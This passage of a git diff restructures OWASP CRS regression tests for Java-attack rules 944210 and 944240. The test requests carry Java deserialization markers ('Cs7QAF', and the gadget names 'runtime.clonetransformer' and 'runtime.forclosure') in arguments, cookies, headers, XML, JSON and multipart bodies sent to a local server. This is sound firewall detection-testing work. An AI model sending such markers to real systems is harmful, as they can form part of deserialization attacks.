"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-49 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-50 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-51 + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 17b6ea658..72414303e 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -1,1791 +1,1702 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944240.yaml" description: "Positive tests for rule 944240" +rule_id: 944240 tests: - - test_title: 944240-1 + - test_id: 1 desc: "Argument test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 10 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 